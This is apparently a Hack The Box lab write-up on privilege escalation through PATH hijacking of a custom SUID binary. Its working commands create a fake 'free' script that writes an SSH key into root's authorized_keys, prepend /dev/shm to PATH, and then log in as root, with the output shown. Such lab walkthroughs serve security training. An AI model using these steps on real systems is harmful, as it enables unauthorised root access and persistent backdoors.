SUID to Path Hijacking
In the context of executing SUID (Set User ID) binaries, it’s important to consider the behavior of these binaries with respect to environment variables. When a user executes an SUID binary, it inherits the environment variables of the executor. This inheritance, while convenient for maintaining user-specific settings and configurations, also introduces a security concern. Namely, it opens the door for potential privilege escalation, as the code executed by the SUID binary operates within the context of the executor’s user privileges. This can become problematic when an attacker exploits this behavior to manipulate environment variables and potentially gain unauthorized access or control.
Furthermore, during the earlier assessment, a custom SUID binary has been identified that performs a series of operations by invoking multiple other binaries to check the system’s status. A significant security issue arose from the fact that none of these invoked binaries were defined with their absolute paths. This oversight leaves room for exploitation, as an attacker can specify their own path, potentially leading to the inclusion of a malicious binary in the process. Such an attack effectively “hijacks” the operation and poses a significant security risk to the system. It is imperative to address this vulnerability promptly to mitigate potential threats and enhance system security.
theseus@ubuntu:/dev/shm$ echo 'mkdir -p /root/.ssh ; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali" > /root/.ssh/authorized_keys' > /dev/shm/free ; chmod 777 /dev/shm/freeThe command above would generate a “binary” (free) with its content consists of commands;
- to first generate a SSH directory to the home directory of the
rootuser - to write my own public SSH key to the
authorized_keysfile of therootuser
theseus@ubuntu:/dev/shm$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
theseus@ubuntu:/dev/shm$ export PATH=/dev/shm:$PATH
theseus@ubuntu:/dev/shm$ echo $PATH
/dev/shm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binI will then update the current user’s environment viable to start with the current directory (/dev/shm) where the malicious binary, free, resides
theseus@ubuntu:/dev/shm$ /bin/sysinfo
[...REDACTED...]
====================MEM Usage=====================Upon the execution of the SUID binary, I can no longer see that the usual output of free command
This indicates that the SUID binary has executed the malicious binary, /dev/shm/free, instead of the original one at /usr/bin/free
┌──(kali㉿kali)-[~/archive/htb/labs/magic]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-42-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- reduce system reboots and improve kernel security. activate at:
https://ubuntu.com/livepatch
407 packages can be updated.
305 updates are security updates.
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Your Hardware Enablement Stack (HWE) is supported until April 2023.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ubuntu:~# whoami
root
root@ubuntu:~# hostname
ubuntu
root@ubuntu:~# ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.185 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:77ae prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:77ae prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:77:ae txqueuelen 1000 (Ethernet)
RX packets 192201 bytes 24263685 (24.2 MB)
RX errors 0 dropped 35 overruns 0 frame 0
TX packets 184050 bytes 53813741 (53.8 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 16578 bytes 1296648 (1.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 16578 bytes 1296648 (1.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0System Level Compromise